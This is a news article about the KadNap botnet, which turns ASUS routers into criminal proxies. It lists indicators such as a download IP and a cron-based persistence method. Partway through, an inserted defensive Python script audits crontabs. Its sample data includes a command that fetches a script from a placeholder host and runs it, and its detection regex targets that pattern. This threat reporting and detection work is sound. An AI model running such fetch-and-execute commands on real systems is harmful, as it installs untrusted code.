A newly identified botnet, named KadNap, is specifically targeting ASUS routers and similar networking devices, transforming them into proxies for cybercriminal activities. Since its emergence in August 2025, the KadNap botnet has expanded to encompass approximately 14,000 devices, forming a peer-to-peer network that connects to command-and-control (C2) infrastructure through a customized version of the Kademlia Distributed Hash Table (DHT) protocol. This decentralized architecture complicates efforts to identify and disrupt the C2 servers controlling the botnet.
According to researchers at Black Lotus Labs, the threat research division of Lumen Technologies, nearly half of the KadNap network is connected to C2 infrastructure specifically designed for ASUS-based bots. The remaining devices communicate with two other distinct control servers. The majority of infected devices are located in the United States, which accounts for approximately 60% of the total, with notable infections also reported in Taiwan, Hong Kong, and Russia.
The infection process begins when a device downloads a malicious script known as aic.sh from the IP address 212.104.141[.]140. This script establishes persistence by creating a cron job that executes every 55 minutes. The payload is an ELF binary called kad, which installs the KadNap client. Once activated, the malware identifies the host’s external IP address and contacts multiple Network Time Protocol (NTP) servers to gather the current time and system uptime.
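A defender-side check for the persistence mechanism described above, added here as an example; it is not code from the original article or from Black Lotus Labs. It parses crontab entries and flags any that match the reported indicators (the aic.sh script, the kad binary, a 55-minute schedule, or a download piped straight into a shell). The sample crontab and the example.invalid URL are constructed, and the check assumes the 55-minute schedule appears as `*/55` in the minute field.

```python
"""Audit crontab text for the cron-based persistence pattern reported for KadNap."""
import re
from dataclasses import dataclass, field

# Indicators taken from the article: downloader script name, ELF payload name,
# and the 55-minute execution interval.
SUSPECT_NAMES = ("aic.sh", "kad")
SUSPECT_INTERVAL = 55
# Generic download-and-execute shape (curl/wget output piped into a shell).
FETCH_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")


@dataclass
class Finding:
    line: str
    reasons: list = field(default_factory=list)


def audit_crontab(text: str) -> list:
    """Return one Finding per non-comment cron line that matches an indicator."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # minute hour dom month dow command
        if len(fields) < 6:
            continue
        minute, command = fields[0], fields[5]
        reasons = []
        # Assumption: the 55-minute schedule is expressed as */55 in the minute field.
        if minute == f"*/{SUSPECT_INTERVAL}":
            reasons.append("55-minute interval")
        for name in SUSPECT_NAMES:
            # Match the name as a whole path component or token, not as a substring.
            if re.search(r"(^|[/\s])" + re.escape(name) + r"(\s|$)", command):
                reasons.append(f"references {name}")
        if FETCH_EXEC.search(command):
            reasons.append("download-and-execute")
        if reasons:
            findings.append(Finding(line, reasons))
    return findings


# Constructed sample crontab (not a real capture): one benign job, two suspicious ones.
SAMPLE_CRONTAB = """
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/55 * * * * /tmp/kad
*/55 * * * * wget -qO- http://example.invalid/aic.sh | sh
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f.line, "->", ", ".join(f.reasons))
```

On a live device the same function can be fed the output of `crontab -l` or the contents of /etc/crontabs and /var/spool/cron.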
To enhance its evasion capabilities, KadNap employs a modified version of the Kademlia-based DHT protocol. This technique conceals the IP addresses of its infrastructure within a peer-to-peer system, making traditional network monitoring less effective. The researchers state, “KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring.” Infected devices utilize the DHT protocol to locate and connect with a C2 server, complicating the efforts of cybersecurity professionals to identify and neutralize these threats.
Despite the decentralized nature of the protocol, Black Lotus Labs observed that bots consistently pass through two specific nodes before reaching the C2 servers. This choke point undercuts the decentralization the design is meant to provide and may make the control infrastructure easier to identify.
The KadNap botnet has connections to the Doppelganger proxy service, which is believed to be a rebranding of the Faceless service previously associated with the TheMoon malware botnet. Doppelganger offers access to infected devices as residential proxies, which cybercriminals can use for various malicious activities such as launching distributed denial-of-service (DDoS) attacks, credential stuffing, and brute-force attacks.
In response to the rising threat posed by the KadNap botnet, Lumen Technologies has initiated proactive measures. At the time of this report, the company said it had “blocked all network traffic to or from the control infrastructure.” While this disruption applies only to Lumen’s network, the company plans to release a list of indicators of compromise to assist other organizations in mitigating the botnet’s impact on their networks.
As the cybersecurity landscape continues to evolve, the emergence of sophisticated botnets like KadNap underscores the need for vigilance and robust security measures to protect against increasingly complex cyber threats.